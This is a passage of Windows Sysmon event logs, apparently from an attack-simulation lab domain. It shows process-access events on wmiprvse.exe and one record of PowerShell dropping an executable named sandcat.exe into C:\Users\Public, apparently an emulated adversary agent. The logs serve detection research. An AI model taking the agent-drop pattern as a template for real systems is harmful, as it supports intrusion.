C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:10.893","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1005,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:10.893\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 2328\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x101541\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+20fee|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+43f7|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+15538|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+1498a|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+146e6|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+140fe|C:\\Windows\\system32\\wbem\\wbemcore.dll+b920|C:\\Windows\\system32\\wbem\\wbemcore.dll+255ff|C:\\Windows\\system32\\wbem\\wbemcore.dll+24a9a|C:\\Windows\\system32\\wbem\\wbemcore.dll+2485e|C:\\Windows\\system32\\wbem\\wbemcore.dll+2685b|C:\\Windows\\system32\\wbem\\wbemcore.dll+22b78|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+22711|C:\\Windows\\system32\\wbem\\wbemcore.dll+2d78c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:10.893","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"2328","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x101541","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+20fee|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+43f7|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+15538|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+1498a|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+146e6|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+140fe|C:\\Windows\\system32\\wbem\\wbemcore.dll+b920|C:\\Windows\\system32\\wbem\\wbemcore.dll+255ff|C:\\Windows\\system32\\wbem\\wbemcore.dll+24a9a|C:\\Windows\\system32\\wbem\\wbemcore.dll+2485e|C:\\Windows\\system32\\wbem\\wbemcore.dll+2685b|C:\\Windows\\system32\\wbem\\wbemcore.dll+22b78|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+22711|C:\\Windows\\system32\\wbem\\wbemcore.dll+2d78c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1006,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:10.924\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 996\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:10.924","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"996","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1007,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:10.924\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 996\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:10.924","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"996","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1008,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:10.924\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:10.924","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1009,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:10.924\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:10.924","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1010,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:10.924\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:10.924","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":1011,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 07:53:11.346\r\nProcessGuid: {41C8662E-1F63-5F25-0000-0010E2370100}\r\nProcessId: 2080\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Public\\sandcat.exe\r\nCreationUtcTime: 2020-08-01 07:53:11.346","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 07:53:11.346","ProcessGuid":"{41C8662E-1F63-5F25-0000-0010E2370100}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Public\\sandcat.exe","CreationUtcTime":"2020-08-01 07:53:11.346","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1012,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:11.752\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010923B0100}\r\nSourceProcessId: 2112\r\nSourceThreadId: 2792\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-1F64-5F25-0000-0010B46A0100}\r\nTargetProcessId: 2256\r\nTargetImage: C:\\Windows\\system32\\compattelrunner.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:11.752","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010923B0100}","SourceProcessId":"2112","SourceThreadId":"2792","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-1F64-5F25-0000-0010B46A0100}","TargetProcessId":"2256","TargetImage":"C:\\Windows\\system32\\compattelrunner.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\